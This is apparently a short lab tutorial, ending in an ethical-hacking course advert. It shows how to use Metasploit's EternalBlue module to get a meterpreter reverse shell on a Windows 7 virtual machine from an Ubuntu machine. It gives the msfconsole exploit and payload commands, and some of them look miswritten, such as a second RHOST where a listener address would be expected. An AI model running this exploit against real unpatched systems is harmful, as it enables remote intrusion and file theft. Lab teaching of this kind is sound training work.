EternalBlue is an exploit supposedly developed by the NSA. It was leaked by the hacker group “Shadow Brokers” on April 14, 2017, and was used in the common ransomware attack with WannaCry on May 12, 2017.
Name of the module
exploit / windows / smb / ms17_010_eternalblue
Sean Dillon <sean.dillon [at] riskense.com>
Dylan Davis <dylan.davis [at] riskense.com>
Group of equations
Windows 7 and Server 2008 R2 (x64) All Service Packs
msf > use exploit/windows/smb/ms17_010_eternalblue msf exploit(ms17_010_eternalblue) > show targets ...targets... msf exploit(ms17_010_eternalblue) > set TARGET <target-id> msf exploit(ms17_010_eternalblue) > show options ...show and set options... msf exploit(ms17_010_eternalblue) > exploit
We will make a simple example so you can see the scope of this module.
The requirements are the following:
- Windows 7 virtual machine
- Linux ubuntu virtual machine
As a first step we make sure that they are connected in the same network. that the Linux machine can ping windows 7.
EternalBlue is an exploit that exploits a vulnerability in Microsoft SMB v1.0. This exploit is now commonly used in malware to help spread it across a network. Some malicious programs that have been used are WannaCry, Trickbot, WannaMine and many others. Machines that are not patched against this vulnerability have a high risk of attack.
let’s start playing with this
We open a ubuntu terminal and write the following.
$ msfconsole -q > use exploit/windows/smb/ms17_010_eternalblue > set RHOST 192.168.248.3 > use payload/windows/x64/meterpreter/reverse_tcp > set RHOST 192.168.248.4
meterpreter > shell
As a final result we have a shell of our victim, and besides that, we can look for the files that we want.
Try Certified Ethical Hacker for FREE!!!– https://infosecaddicts.com/course/certified-ethical-hacker-v10/